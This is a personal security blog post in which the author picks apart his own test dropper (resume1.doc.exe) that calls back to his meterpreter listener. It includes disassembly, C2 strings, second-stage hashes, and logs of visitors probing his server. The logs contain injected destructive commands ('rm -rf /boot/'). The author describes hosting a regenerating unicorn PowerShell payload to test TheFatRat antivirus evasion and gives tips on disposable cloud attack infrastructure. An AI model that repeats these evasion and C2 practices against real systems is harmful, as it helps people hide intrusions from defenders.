0xefc8911e,====< 0x000000d6 700e jo 0xe6|||||| 0x000000d8 a85f test al, 0x5f ; '_'|||||| 0x000000da 31fe xor esi, edi|||||| 0x000000dc 40 inc eax|||||| 0x000000dd 8abe2170b514 mov bh, byte [esi + 0x14b57021] ; [0x14b57021:1]=255|||||| 0x000000e3 4a dec edx|||||| 0x000000e4 1a5ac1 sbb bl, byte [edx - 0x3f]||||| 0x000000e7 22b2c348b823 and dh, byte [edx + 0x23b848c3]||||| 0x000000ed 0b47c4 or eax, dword [edi - 0x3c]||||| 0x000000f0 638764382d60 arpl word [edi + 0x602d3864], ax||||| 0x000000f6 002a add byte [edx], ch||||| 0x000000f8 d9805f104f9e fld dword [eax - 0x61b0efa1],====< 0x000000fe 753f jne 0x13f; because lazy and timehttps://app.any.run/tasks/995eb5e3-4c5f-4c47-b849-67ff647c6387; Connection data(myserver):9008 -> exe came acrossdumped entire pcap from c2 into file:- file resumepcap.hexdump-- resumepcap.hexdump: dataegrep -nor '[^ ]{30,}' resumepcap.stringsdump |grep string1237:string=core_negotiate_tlv_encryption1238:string=core_transport_set_timeouts1239:string=core_transport_getcerthash1240:string=core_transport_setcerthash1261:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r1382:string=InitializeCriticalSectionEx1385:string=SetThreadStackGuarantee1388:string=WaitForThreadpoolTimerCallbacks1393:string=FlushProcessWriteBuffers1394:string=FreeLibraryWhenCallbackReturns1395:string=GetCurrentProcessorNumber1396:string=GetLogicalProcessorInformation1398:string=SetDefaultDllDirectories1404:string=GetUserDefaultLocaleName1409:string=GetFileInformationByHandleExW1410:string=SetFileInformationByHandleW1436:string=GetUserObjectInformationW1437:string=GetProcessWindowStation1770:string=QQ𥸸𥽼𦃀ᙏὫ峹巋O3ï澢漣瀻瀎潌滺殭歩樭栺损槎摲撋搹敷掊搔措揉敆檇憺抪戡拔曇晬暧晜暄栎枵枍曧杘朏晋昪欗棭榨梽硒砩礓禔穑𦅭𦅲𦠑𦆆𦆗𦆦𦆴𦇃𦇛𦇯𦈅𦈠𦈰𦈿𦉒𦉲𦊄𦊖𦊥𦋃𦋔𦋥𦋵𦌌𦌙𦌦𦍁𦍡𦍳𦎋𦎩𦎺𦏈𦏢𦏺𦐍𦐤𦐳𦑈𦑙𦑮𦒂𦒛𦒹𦓎𦓟𦓵𦔉𦔞𦔳𦕆𦕜𦕰𦖇𦖢𦖲𦗒𦗠𦗴𦘋𦘚𦘪𦘹𦙔𦙨𦙾𦚘𦚳𦛌𦛨𦜂𦜟𦜯𦝍𦝮𦝾𦞝𦞶𦟈𦟝𦟷𠁐1773:string=packet_get_tlv_value_string1774:string=packet_get_tlv_value_uint1775:string=packet_get_tlv_value_wstring1777:string=packet_is_tlv_null_terminated1778:string=packet_remove_completion_handler1780:string=packet_transmit_empty_response1781:string=packet_transmit_response1784:string=scheduler_insert_waitable1785:string=scheduler_signal_waitable1786:string=_scheduler_waitable_thread@41789:string=CertGetCertificateContextProperty1813:string=WinHttpGetIEProxyConfigForCurrentUser1826:string=SetUnhandledExceptionFilter1856:string=GetProcessWindowStation1857:string=GetUserObjectInformationW1862:string=AllocateAndInitializeSid1864:string=InitializeSecurityDescriptor1865:string=SetSecurityDescriptorDacl1866:string=SetSecurityDescriptorSacl1873:string=CryptImportPublicKeyInfo1895:string=CreateToolhelp32Snapshot1903:string=GetSystemTimeAsFileTime1908:string=IsProcessorFeaturePresent1922:string=QueryPerformanceCounter1924:string=FreeEnvironmentStringsW1925:string=UnhandledExceptionFilter1926:string=InitializeCriticalSectionAndSpinCount1946:string=ImpersonateLoggedOnUser2008:string=core_pivot_session_died2028:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r2056:string=\t\a\f\b\f\t\f\n\a\v\b\f2061:string=abcdefghijklmnopqrstuvwxyz2062:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ2064:string=abcdefghijklmnopqrstuvwxyz2065:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ2147:string=6#6'6+6/63676;6/8N8m8r82183:string=3\a43494=4B4H4L4R4V4\4`4e4k4o4u4y42186:string=:\b:$:0:6:A:O:X:b:r:w:|:2212:string=2$2*22272=2E2J2P2X2]2c2k2p2v2~22248:string=6<:@:D:H:L:P:T:X:\:`:d:h:2255:string=:$:,:4:<:D:L:T:\:d:l:t:|:2256:string=;$;,;4;<;D;L;T;\;d;l;t;|;2257:string=<$<,<4<<<D<L<T<\<d<l<t<|<2258:string==$=,=4=<=D=L=T=\=d=l=t=|=2259:string=>$>,>4><>D>L>T>\>d>l>t>|>2260:string=?$?,?4?<?D?L?T?\?d?l?t?|?2261:string=0$0,040<0D0L0T0\0d0l0t0|0; Got new binary / 2nd stagebinwalk -e resumepcap.hexdumpfile _resumepcap.hexdump.extracted/4_resumepcap.hexdump.extracted/4: PE32 executable (DLL) (GUI) Intel 80386, for MS Windowsmd5sum _resumepcap.hexdump.extracted/4eeb70c0bd145011062f0116738e10a5e _resumepcap.hexdump.extracted/4_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md5: eeb70c0bd145011062f0116738e10a5e_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16: 4df2_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32: c854733c_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md4: db31d79e9eaddfc0a93e043d058c9ca0_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xor: ae_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xorpair: 54fa_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d parity: 01_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d entropy: 07000000_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d hamdist: 06_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d pcprint: 22_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d mod255: f6_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xxhash: ae3757fa_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d adler32: 52af2f02_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d luhn: 03_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc8smbus: ef_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc15can: 759f_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16hdlc: 270e_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16usb: 2328_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16citt: 8672_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc24: bd3f25_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32c: 2fa98f85_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32ecma267: c7e20603; lazy again:cp _resumepcap.hexdump.extracted/4 ./4.exehttps://www.virustotal.com/#/file/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f/detectionhttps://www.hybrid-analysis.com/sample/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f?environmentId=120; Total IOCs(myserver):90089A8FE886ABA12E02FD0FC44F004A7111rahash2 -a all _resumepcap.hexdump.extracted/4 |awk '{print $3,$4}'md5: eeb70c0bd145011062f0116738e10a5esha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6fsha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cffcrc16: 4df2crc32: c854733cmd4: db31d79e9eaddfc0a93e043d058c9ca0xor: aexorpair: 54faparity: 01entropy: 07000000hamdist: 06pcprint: 22mod255: f6xxhash: ae3757faadler32: 52af2f02luhn: 03crc8smbus: efcrc15can: 759fcrc16hdlc: 270ecrc16usb: 2328crc16citt: 8672crc24: bd3f25crc32c: 2fa98f85crc32ecma267: c7e20603rahash2 -a all resume1.doc.exe |awk '{print $3,$4}'md5: 90f7ee1bf4451349dfa7c518a8c6202asha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0adsha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691crc16: 9f78crc32: 1b63e4bdmd4: 282dcd274bd2efade3765ddff3ec65e1xor: ebxorpair: 3ad1parity: 00entropy: 03000000hamdist: 01pcprint: 2dmod255: 4dxxhash: 5924b386adler32: 913ba49cluhn: 00crc8smbus: 3fcrc15can: 5a1dcrc16hdlc: 4045crc16usb: a732crc16citt: 4b6acrc24: 7a1917crc32c: d18b15a4crc32ecma267: df97a7b0rahash2 -a all resumebase64.decoded |awk '{print $3,$4}'md5: 3205f33d70ec93109d60da5fe1002e7esha1: ec19a5fa86353b176941809b1e9858aead9047a3sha256: e02b170466ee0f810656bfeca8c9c7ce523b635fa36248dd7f9259629a593be5sha384: f232b1f8dd2d2c4d07dc761eb6ef1b7defbc6379f15222d607e43e22a2f0c48ea98986db9e32164e3c88287d34224d73sha512: 547fb256993e4febce7f3da35ce5cfbf485e8ee97f9fe1861b82172b4c7f94082fa5b66738d289a0db2fb3be97acb900290786bf987f813ef00eb8aee97f1f51crc16: 78afcrc32: d40234f5md4: 1a8108290cfc7ffa605b0879d6e3b8f2xor: 0axorpair: 0a00parity: 00entropy: 03000000hamdist: 02pcprint: 32mod255: 98xxhash: c09b7c9badler32: be051623luhn: 09crc8smbus: 84crc15can: 4d93crc16hdlc: e7facrc16usb: 8313crc16citt: f7bacrc24: e9c836crc32c: 75c98a63crc32ecma267: 04a00a8f
The gist of all that, is that it connected back to port 9008 on my server where I have an active meterpreter listener forwarded to. Pretty easy, not really a difficult analysis, really a 5 minute rush job. But, it does help me know that meterpreter launches that secondary payload when ran, that's pretty sweet, though everyone sort of knew that. But since launching this and a few other things online, I've received a number of hits on my shell from people looking at that port:
185.220.101.6As of the time of this writing:
163.172.214.8
37.59.20.111
107.178.194.23
52.200.221.20
14.141.107.206
66.249.88.132
208.87.233.140
185.220.101.13
161.69.99.11
5.62.59.93
1.192.194.17
134.96.238.193
50.112.194.65
curl "https://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv" 2>/dev/null|grep "185.220.101.6\|163.172.214.8\|37.59.20.111\|107.178.194.23\|52.200.221.20\|50.112.194.65\|14.141.107.206\|66.249.88.132\|208.87.233.140\|185.220.101.13\|161.69.99.11\|5.62.59.93\|1.192.194.17\|134.96.238.193\|50.112.194.65"
163.172.214.8185.220.101.6185.220.101.13
This last one is sort of amusing because it tells me they looked a little bit into my site:
/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Edit, I wanted to add more because it amuses me the comparison between ips connecting to my c2 port for my test malware versus the hosts connecting to my web server, not including tor nodes:
grep -i "37.59.20.111\|107.178.194.23\|52.200.221.20\|14.141.107.206\|66.249.88.132\|208.87.233.140\|161.69.99.11\|5.62.59.93\|1.192.194.171\|34.96.238.193\|50.112.194.65" /var/log/apache2/access.log* /var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:107.178.194.23 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html?lol&rm%20-rf%20/boot/&rm%20-rf%20/opt/&rm%20-rf%20~/& HTTP/1.1" 200 654 "http://0daz.io" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html HTTP/1.1" 200 654 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:57 -0600] "GET /coinhive.min.js HTTP/1.1" 200 18805 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:32:39 -0600] "GET / HTTP/1.1" 200 8440260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"/var/log/apache2/access.log.8:52.200.221.20 - - [05/Mar/2018:10:35:21 -0600] "GET / HTTP/1.1" 200 157832 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
But what are people trying to analyze? Well the miner one, with that particular notion at the end, was one provided in another post on this blog plus my own get data to it. This was specific to a url attempt put into virus total because I want to track who's tracking this. The diagfix is unrelated, but is a repeatedly regenerated (every 300 seconds) unicorn powershell payload. Did this for ease of use and testing the "fud" capabilities of TheFatRat. Honestly, it does a decent job of evading some shit, but anyone who looks at it for a split second would recognize it. Yara rules could easily determine it, or the exec form. You'll see in my above example I left out the meterpreter yara rules, this is because well, analysis without the answer provided to me.
Things I learned with this week of dickery:
- People seem to be rummaging through analyzing things they happen across, or that were involved in something flagged by the apt detection bs.
- apparently people detect meterpreter data as part of poison ivy
- looked further, neat, the copy of poison ivy I have does partially contain code from meterpreter's stdapi nonsense it sends down.
- TheFatRat as a wrapper is pretty nice, but it can be ignored for the power.py and pw_exec.py tools on your own. Such as in a cron/at/while loop.
- Automated tools used when analyzing things often show weaker precautions than those meant to provide the reports.
- $5 cloud or docker instance, for a few hours of playing with just a minimal amount of preparation before hand, builds a full purposed suite for rapid spin up, attack, and spin down.
- Better yet, cloud services providing per hour pay, awww yeah... just don't assume they actually destroy things when it seems they did, go ahead and 0fill everything that you don't want shared before you deprovision.
-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour

https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour
No comments:
Post a Comment